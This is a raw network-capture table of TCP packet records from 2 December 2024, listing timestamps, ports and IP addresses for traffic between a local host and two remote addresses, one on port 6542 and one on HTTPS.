Dec 2, 2024 18:39:33.731061935 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:36.795692921 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:36.795749903 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:36.795773029 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:36.795819998 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:36.796803951 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:36.796890020 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:36.796968937 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:36.797014952 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:36.799412966 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:36.799468994 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:36.799588919 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:36.799634933 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:36.802088022 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:36.802139997 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:36.802345037 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:36.802392006 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:36.804941893 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:36.804991961 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:36.805180073 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:36.805226088 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:36.808044910 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:36.808095932 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.006331921 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.006417036 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.006457090 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.007102013 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.007128954 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.007174015 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.007261038 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.007328033 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.008770943 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.008842945 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.008912086 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.008950949 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.011555910 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.011569977 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.011629105 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.013895988 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.013959885 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.014027119 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.014065981 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.016490936 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.016545057 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.016849041 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.016885996 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.019351959 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.019396067 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.019442081 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.019517899 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.021737099 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.021791935 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.021862030 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.021900892 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.024830103 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.024836063 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.024888992 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.028012037 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.028177023 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.029769897 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.029820919 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.030633926 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.030673027 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.030678034 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.030710936 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.033289909 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.033334970 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.033456087 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.033494949 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.035542965 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.035583973 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.199305058 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.199477911 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.217405081 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.217480898 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.217569113 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.217612982 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.218652964 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.218702078 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.218816996 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.218859911 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.220686913 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.220735073 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.220995903 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.221040964 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.223364115 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.223409891 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.223496914 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.223541975 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.225903988 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.225953102 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.226284027 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.226330996 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.228682995 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.228732109 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.228856087 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.228899002 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.231353998 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.231400967 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.231578112 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.231622934 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.234111071 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.234164000 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.234333038 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.234376907 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:37.236440897 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:37.236494064 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:40:49.465698957 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 2, 2024 18:40:49.465769053 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:40:53.209929943 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:40:53.224644899 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:40:53.375067949 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 2, 2024 18:40:53.375077963 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:40:53.375148058 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:40:58.295285940 CET	49865	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:40:58.295320034 CET	443	49865	104.21.16.251	192.168.2.4
Dec 2, 2024 18:40:58.295502901 CET	49865	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:40:58.295789957 CET	49865	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:40:58.295803070 CET	443	49865	104.21.16.251	192.168.2.4
Dec 2, 2024 18:40:59.589608908 CET	443	49865	104.21.16.251	192.168.2.4
Dec 2, 2024 18:40:59.589693069 CET	49865	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:40:59.642682076 CET	49865	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:40:59.642704964 CET	443	49865	104.21.16.251	192.168.2.4
Dec 2, 2024 18:40:59.643054962 CET	443	49865	104.21.16.251	192.168.2.4
Dec 2, 2024 18:40:59.643125057 CET	49865	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:40:59.643857002 CET	49865	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:40:59.687354088 CET	443	49865	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:00.662934065 CET	443	49865	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:00.663023949 CET	49865	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:00.663028955 CET	443	49865	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:00.663073063 CET	49865	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:00.665596962 CET	49865	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:00.665615082 CET	443	49865	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:01.699734926 CET	49873	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:01.699790955 CET	443	49873	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:01.701666117 CET	49873	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:01.705079079 CET	49873	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:01.705101013 CET	443	49873	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:02.966492891 CET	443	49873	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:02.966559887 CET	49873	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:02.967614889 CET	49873	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:02.967629910 CET	443	49873	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:02.969540119 CET	49873	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:02.969552994 CET	443	49873	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:03.696644068 CET	443	49873	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:03.696751118 CET	443	49873	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:03.699740887 CET	49873	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:03.703552008 CET	49873	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:03.703571081 CET	443	49873	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:03.778040886 CET	49879	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:03.778090954 CET	443	49879	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:03.779591084 CET	49879	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:03.779591084 CET	49879	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:03.779628038 CET	443	49879	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:05.046016932 CET	443	49879	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:05.046080112 CET	49879	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:05.046988010 CET	49879	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:05.046994925 CET	443	49879	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:05.049316883 CET	49879	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:05.049321890 CET	443	49879	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:05.812248945 CET	443	49879	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:05.812356949 CET	443	49879	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:05.812361956 CET	49879	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:05.812405109 CET	49879	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:05.822629929 CET	49879	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:05.822650909 CET	443	49879	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:05.961549044 CET	49885	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:05.961601019 CET	443	49885	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:05.961692095 CET	49885	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:05.961955070 CET	49885	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:05.961967945 CET	443	49885	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:07.769145966 CET	443	49885	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:07.769253969 CET	49885	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:07.769776106 CET	49885	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:07.769784927 CET	443	49885	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:07.770904064 CET	49885	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:07.770909071 CET	443	49885	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:08.550879002 CET	443	49885	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:08.550992012 CET	443	49885	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:08.551104069 CET	49885	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:08.555011988 CET	49885	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:08.555030107 CET	443	49885	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:08.573306084 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:08.573354006 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:08.573647022 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:08.573930025 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:08.573944092 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:09.886286020 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:09.886491060 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:09.886915922 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:09.886928082 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:11.650089979 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:11.650119066 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.455441952 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.455502033 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.455502987 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.455539942 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.455554008 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.455584049 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.455859900 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.455909014 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.455914974 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.455949068 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.456418991 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.456454039 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.456492901 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.456552982 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.463695049 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.463741064 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.463845015 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.463886023 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.472363949 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.472430944 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.472490072 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.472536087 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.575793028 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.575846910 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.575978041 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.576114893 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.665704012 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.665786028 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.669526100 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.669575930 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.669684887 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.669728994 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.677387953 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.679399014 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.679406881 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.679785013 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.685291052 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.685431004 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.685436964 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.685961008 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.693273067 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.695509911 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.700977087 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.701349974 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.701354980 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.701787949 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.708887100 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.709005117 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.709031105 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.709037066 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.710165977 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.716869116 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.721322060 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.721333981 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.723306894 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.723978996 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.725467920 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.730859041 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.731264114 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.731272936 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.731359959 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.738163948 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.739406109 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.739411116 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.739694118 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.745089054 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.747526884 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.747538090 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.747689962 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.752144098 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.755409956 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.759066105 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.759252071 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.759258986 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.759327888 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.759331942 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.759406090 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.876307011 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.876449108 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.878467083 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.878529072 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.878745079 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.878834009 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.888251066 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.888341904 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.897404909 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.897486925 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.902740002 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.902837992 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.911753893 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.911822081 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.920336008 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.920429945 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.929475069 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.929527044 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.929541111 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.929552078 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.929586887 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.929642916 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.939029932 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.939095020 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.947751045 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.947813034 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.956912041 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.956979990 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.961875916 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.961986065 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.970818996 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.970889091 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.979881048 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.979975939 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.987644911 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.987760067 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:12.991480112 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:12.991590023 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.088988066 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.089088917 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.095899105 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.095984936 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.099499941 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.099679947 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.106136084 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.106220007 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.112888098 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.112963915 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.116215944 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.116328001 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.123941898 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.124010086 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.129646063 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.129771948 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.134913921 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.134985924 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.138149023 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.138298035 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.144500017 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.144628048 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.147656918 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.147809029 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.155841112 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.155910969 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.162105083 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.162230968 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.164829969 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.164954901 CET	49891	443	192.168.2.4	104.21.16.251
